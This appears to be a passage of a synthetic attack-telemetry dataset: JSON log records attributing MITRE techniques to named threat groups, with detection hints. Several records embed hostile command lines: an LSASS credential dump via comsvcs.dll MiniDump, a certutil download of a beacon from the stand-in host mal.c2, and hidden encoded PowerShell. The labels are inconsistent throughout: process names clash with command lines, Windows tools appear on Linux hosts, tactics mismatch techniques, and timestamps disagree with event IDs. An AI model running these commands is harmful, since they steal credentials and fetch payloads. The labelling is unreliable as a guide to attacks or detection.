full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-12T07:56:05.000Z","user":{"name":"azuread\\cdshves532p4","sid":"S-1-5-21-737177881-520140508-5110"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Collection","Discovery"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20260411T015109000Z_0006191","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.126.22.169","name":"IAM-ROLE-GXME74JHXH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6191Scattered SpiderT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.34.115.30","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-06-02T14:33:26.000Z","user":{"name":"arn:aws:iam::d7174afljpfh","sid":"S-1-5-21-707631279-891733372-3152"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Credential Access","Collection"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260401T134801000Z_0006193","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.125.159.178","name":"IAM-ROLE-H2IZ3TVCH8","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6193Volt TyphoonT1059.001"},"network":{"domain":"github.com","dst_ip":"1.0.19.165","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1514 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-21T16:33:11.000Z","user":{"name":"i-fvyn47ny0mey","sid":"S-1-5-21-352878216-389273968-7602"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20250624T153258000Z_0006195","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.197.115.123","name":"EC2-INST-3N93642IRV","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6195Mustang PandaT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.43.59.204","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-07T20:26:24.000Z","user":{"name":"i-z0xg3clf6ans","sid":"S-1-5-21-659162807-553527414-9583"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20250418T184147000Z_0006197","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.88.172.113","name":"APP-WEB-KODMVTYW54","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6197UNC4841T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.100.226.141","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-02-27T10:25:42.000Z","user":{"name":"arn:aws:iam::qvij6z7ogog4","sid":"S-1-5-21-286063714-993725974-8163"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Reconnaissance","Collection"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20250821T170237000Z_0006199","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.160.243.216","name":"IAM-ROLE-ODWME6L0D9","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6199Lapsus$T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.172.40.208","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-09-15T03:06:31.000Z","user":{"name":"i-8rghivi1wgw3","sid":"S-1-5-21-327568299-817532856-1023"}} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.